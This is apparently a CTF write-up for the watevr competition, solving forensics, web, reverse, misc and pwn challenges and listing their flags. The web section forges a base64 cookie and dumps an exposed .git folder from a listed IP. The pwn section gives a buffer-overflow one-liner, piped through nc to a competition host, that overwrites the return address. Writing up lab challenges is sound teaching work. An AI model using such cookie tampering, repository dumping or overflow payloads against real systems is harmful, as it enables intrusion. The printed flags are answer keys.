Forensics

Evil Cuteness

Omg, look at that cute kitty! It’s so cute I can’t take my eyes off it! Wait, where did my flag go?

We can get an image kitty.png

Local Picture

If we use binwalk, we can find that there is a zip file. Use foremost and upzip, we can get the flag watevr{7h475_4c7u4lly_r34lly_cu73_7h0u6h}.


Web

Local Picture

We need $100 to buy the flag. If we decode the cookie with base64 echo -n "eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ==" | base64 -D, we can get {"money": 50, "history": []}.

We can modify the cookie to {"money": 100, "history": []} using echo -n "{\"money\": 100, \"history\": []}" | base64 to get the modified cookie eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0=.

Once we insert it, we can buy the flag watevr{b64_15_4_6r347_3ncryp710n_m37h0d}.


Swedish State Archive

The Swedish State Archive are working on their new site, but it’s not quite finished yet…

From the source code, I saw a file web_server.py. If we check this, there is a line telling us Please do not access the .git-folder. So, we can use a python script git_extract.py from github or other git extracting tools. We use python git_extract.py http://13.53.175.227:50000/.git/, and we can see there is our flag in flag.txt watevr{everything_is_offentligt}.


Reverse

Timeout

In the source code, we find a string. Translate it into ascii with a python script.

1
2
3

l = [0x23,0x3c,0x49,100,0x55,0x2e,0x77,0x20,0x2d,0x73,0x3f,0x7d,0x2c,0x38,0x6c,0x53,0x54,0x2a,0x5a,0x6a,0x57,0x3a,0x66,0x5e,0x4d,0x36,0x65,0x6e,0x70,0x68,99,0x2f,0x4f,0x76,0x25,0x4b,0xb,0x34,0x4c,0x52,0x67,0x60,0x5f,0x45,0x7b,0x72,0x3b,0x7e,0x4a,10,0x6b,0x71,0x43,0x24,0x5c,0x28,0x22,0x40,0x32,0x44,0x62,0x50,0xd,0x26,0x31,0x37,0xc,0x5d,0x79,0x3e,0x3d,0x78,0x61,0x56,0x59,0x41,0x5b,0x42,0x46,0x33,0xb4,0x21,0x74,0x51,0x48,0x75,0x30,0x58,0x69,0x35,0x7c,9,0x39,0x4e,0x2b,0x7a,0x6d,0x47,0x29,0x6f,0,0x77,0x61,0x74,0x65,0x76,0x72,0x7b,0x33,0x6e,99,0x72,0x79,0x74,0x69,0x6f,0x6e,0x5f,0x69,0x73,0x5f,0x6f,0x76,0x65,0x72,0x72,0x61,0x74,0x65,100,0x5f,0x79,0x6f,0x75,0x74,0x75,0x62,0x65,0x2e,99,0x6f,0x6d,0x2f,0x77,0x61,0x74,99,0x68,0x3f,0x76,0x3d,0x4f,0x50,0x66,0x30,0x59,0x62,0x58,0x71,0x44,0x6d,0x30,0x7d,0]

print(''.join(chr(x) for x in l))

And we can get the flag watevr{3ncrytion_is_overrated_youtube.com/watch?v=OPf0YbXqDm0}.


Misc

Unspaellablle

I think the author of this episode’s script had a stroke or something… Or maybe it’s just me?

It gives us a file chall.txt, and here is part of it.

Local Picture

We can find the same text on the Internet, but chall.txt add some extra characters in it such as are playing a game of cawrds.. cawrds should be cards. We use diff to compare the one on the Internet and chall.txt, take all the extra characters out, and we can get the flag watevr{icantspeel_tiny.cc/2qtdez}.


Pwn

Voting Machine 1

In a world with many uncertainties we need some kind of structure. Democracy is a big part of that, therefore we need voting machines! Well, at least if they are safe…

The pseudocode is as follows.

Local Picture

Local Picture

If we cover 2 bytes local_a and 8 bytes saved rbp, we can control rip. super_secret_function can give us the flag, and the address of the function is 0x00000400807.

Once we access (python -c 'print("A"*10+"\x07\x08\x40\x00\x00\x00\x00\x00")') | nc 13.48.67.196 50000, we can get the flag watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}.